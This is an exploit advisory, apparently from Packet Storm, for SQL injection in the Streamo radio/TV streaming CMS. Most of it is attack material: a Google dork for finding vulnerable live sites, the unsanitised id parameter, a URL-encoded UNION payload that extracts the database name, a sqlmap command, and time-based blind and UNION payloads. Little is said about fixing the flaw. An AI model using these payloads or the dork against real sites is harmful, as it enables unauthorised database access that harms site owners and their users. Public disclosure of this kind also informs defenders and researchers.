Streamo Online Radio / TV Streaming CMS SQL Injection

2016-07-08T00:00:00
ID PACKETSTORM:137829
Type packetstorm
Reporter N4TuraL
Modified 2016-07-08T00:00:00

Description

                                        
                                            `######################  
# Application Name : Streamo - Online Radio And Tv Streaming CMS  
  
# Google Dork : inurl:rjdetails.php?id=  
  
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL  
  
# Author Contact : https://twitter.com/byn4tural  
  
# Vendor Homepage : http://rexbd.net/  
  
# Vulnerable Type : SQL Injection  
  
# Date : 2016-07-08  
  
# Tested on : Windows 10 / Mozilla Firefox  
# Linux / Mozilla Firefox  
# Linux / sqlmap 1.0.6.28#dev  
  
###################### SQL Injection Vulnerability ######################  
  
# Location :  
http://localhost/[path]/menu.php  
http://localhost/[path]/programs.php  
http://localhost/[path]/rjdetails.php  
  
######################  
  
# Vulnerable code :  
  
$gid = $_GET["id"];  
  
  
######################  
  
# PoC Exploit:  
  
http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x  
  
# Exploit Code via sqlmap:  
  
sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs  
  
Parameter: id (GET)  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 2 columns  
Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY  
---  
  
######################  
  
`